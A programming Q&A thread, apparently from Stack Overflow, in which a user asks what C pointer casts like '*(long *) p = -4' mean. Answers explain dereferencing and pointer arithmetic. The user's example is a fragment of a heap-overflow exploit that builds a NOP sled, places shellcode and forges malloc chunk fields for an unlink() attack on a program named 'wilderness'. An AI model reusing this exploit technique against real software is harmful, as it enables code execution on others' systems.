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I've come across pointers to casted pointers (not sure that this is the correct term) in C such as:

*(long *) p = 10; I could never for the life of me understand what it means, or, the other example:

*(void *) NULL, or *(char *) 0; I just can't wrap my head around it, could someone please explain this to me, and save me from partial brain damage? :)


(P.S An example is shown below of such usage)

int main(int argc, char *argv[]) { char *p, *payload = (char *) malloc(1052);

    p = payload;
    memset(p, '\x90', 1052);

    /* Jump 12 ahead over the trashed word from unlink() */
    memcpy(p, "\xeb\x0c", 2);

    /* We put the shellcode safely away from the possibly corrupted area */
    p += 1020 - 64 - sizeof(shellcode);
    memcpy(p, shellcode, sizeof(shellcode) - 1);

    /* Set up the prev_size and overflow size fields */
    p += sizeof(shellcode) + 64 - 4;
    *(long *) p = -4;
    p += 4;
    *(long *) p = -16;

    /* Set up the fwd and bck of the fake chunk */
    p += 8;
    *(long *) p = RETLOC - 12;
    p += 4;
    *(long *) p = RETADDR;

    p += 4;
    *(p) = '\0';

    execl("./wilderness", "./wilderness", payload, NULL); }
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7 Answers 7

up vote 3 down vote accepted

First break up the statement:

  long *q = (long*)p;
  *q = 10;
  p += 4;

The p argument is of type char*, you can only read or write 1 byte at a time through that pointer. The cast to long* creates a pointer through which you can read or write 4 bytes at a time from/to the same address. The assignment writes the bytes 0x00, 0x00, 0x00, 0x0A. The same thing as:

  *p = 10;
  *p = 0;
  *p = 0;
  *p = 0;

Depending on byte order. After the assignment, p needs to be incremented by 4 because 4 bytes were written.

This trick is pretty common with buffers of bytes that contain non-byte data.

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Said much more elegantly than myself. –  GrayWizardx Dec 16 '09 at 3:14
long == 4 bytes on windows and 32-bit unix only. long is 8 bytes on 64-bit unix. –  Peeter Joot Dec 16 '09 at 13:42
*(long *) p = -4;

Means: p is a "pointer to a long" and I am trying to assign the value to the memory referenced there. We do this because initially we said p was a char pointer, and we want to change its behavior when accessed.

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So, why don't we just change it to (long *) p = -4; ? or, to assign the value to the memory that's referenced there, &(long *) p = -4? /me is so confused about this... –  Grey Dec 16 '09 at 2:47
But, what do you mean, by assign the value to the memory referenced there? –  Grey Dec 16 '09 at 2:49
if we changed it to (long )p = -4 we would be "saying set the address to -4" and &(long *)p = -4 would be saying set the address of the pointer *for p to -4, which is not allowed AFAIK. Also setting the address of something to -4 is not allowed. –  GrayWizardx Dec 16 '09 at 2:51
Setting unsigned values to signed values is allowed, but it'll cast -4 to 4294967292 (for a 4-byte long type). –  Chris Lutz Dec 16 '09 at 2:53
Ah, I see now; ok. And, what about when things like *(char *) NULL; crop up? –  Grey Dec 16 '09 at 2:54

Putting the * before the (long *) is called "dereferencing" the pointer. It means, as @GrayWizardx says, that you're modifying the value in memory pointed to by the pointer.

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Here's a Google Cache link to a good article...the main link is down currently, for some reason:… –  AJ. Dec 16 '09 at 2:50
In order to access the variable that the pointer points to, right? ok. What about *(char *) NULL; ? –  Grey Dec 16 '09 at 2:51
And, hmm -- why can't we just do "p = -4L" ? –  Grey Dec 16 '09 at 2:52
@Grey, can you give an example of where that code is used? I don't see it in the original question... –  AJ. Dec 16 '09 at 2:53
An example with *(unsigned int *) NULL: codepad.org/iz2TSDfa -- I just came across *(char *) NULL and *(void *) NULL in other places over time ... –  Grey Dec 16 '09 at 2:59


This code writes four bytes of data to address zero in memory. It is not common or accepted practice, and is not applicable on a general basis. In other words: black magic.

I am guessing it triggers some sort of processor interrupt.

I advise you learn assembly/the computer architecture this code targets if you want to understand it.

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The first star is actually dereferencing the casted pointer. Thus, *(long *) p = 10 means cast p to a pointer to long and assign -4 to the dereferenced location. Compare your examples to *p =10 .

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Its the pointer arithmetic, based on the pointer type i.e. whether its char* cPtr or int* nPtr, when you increment cPtr++ will move one byte and nPtr++ would move 4 bytes (assumimg char takes one byte and int takes 4 bytes).

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You may have an easier time when you understand the motivation behind your example code.

The code is manipulating 4-byte values, which is why p is being cast as a long *. The construct * (long *) p = -4; allows you to set 4 bytes to 0xFFFFFFFC with a single assignment. If you left p as a char * you'd need four separate assignments, and you'd also need to worry about the endianness of your platform.

So why not simply declare p as a long * in the first place? Because the code is using pointer arithmetic to calculate the target addresses: p += sizeof(shellcode) + 64 - 4; Pointer arithmetic is easy with a char * because adding 1 to the pointer will advance it to the next byte, just as you would expect. Not so with pointers to other data types! If p were declared as long *p; then p += 4 adds 4 * sizeof(long) to p.

Why? Because this makes it easy to traverse a list of long variables:

long sum_of_longs(long vals[], int num)  { // 'vals[]' contains 'num' long ints.
   long *p;                                // This pointer traverses the array.
   long sum;                               // Running total.

   // Initialize 'p' to the first number in 'vals[]' and
   // increment through the array until 'num' reaches 0.
   // Note that 'p' increases by 4 bytes each time in order
   // to advance to the next long.
   for (sum=0, p=vals;  num > 0;  p++, num--)
      sum += *p;

   return sum;

So, in your example, defining p as a char * makes it easy to do the pointer arithmetic in terms of bytes, and casting it to a long * makes the assignments easier.

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Thanks for this answer, very good and well explained. –  Grey Dec 16 '09 at 3:17

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